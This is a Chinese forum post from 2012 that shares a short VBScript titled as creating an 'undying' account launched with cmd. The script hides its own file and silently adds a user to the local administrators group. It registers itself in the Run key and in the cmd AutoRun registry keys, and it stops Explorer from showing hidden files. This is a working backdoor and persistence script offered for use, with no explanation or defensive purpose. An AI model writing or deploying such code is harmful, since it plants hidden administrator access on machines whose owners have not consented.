VBS建立不死账户随cmd启动

[复制链接]
查看191 | 回复0 | 2012-4-1 19:19:28 | 显示全部楼层 |阅读模式
dimwsh,FA,FSO

setfso=CreateObject("Scripting.FileSystemObject")

SetFA=FSO.GetFile(WScript.scriptFullName)

FA.Attributes=34

setwsh=CreateObject("WScript.Shell")

wsh.run"netuserasd123/add",0,true

wsh.run"netlocalgroupadministratorsasd/add",0,true

wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32",""&FA&""

wsh.Regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"

wsh.regwrite"HKEY_LOCAL_MACHINE\Software\Microsoft\CommandProcessor\AutoRun",""&FA&""

wsh.regwrite"HKEY_CURRENT_USER\Software\Microsoft\CommandProcessor\AutoRun",""&FA&""
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则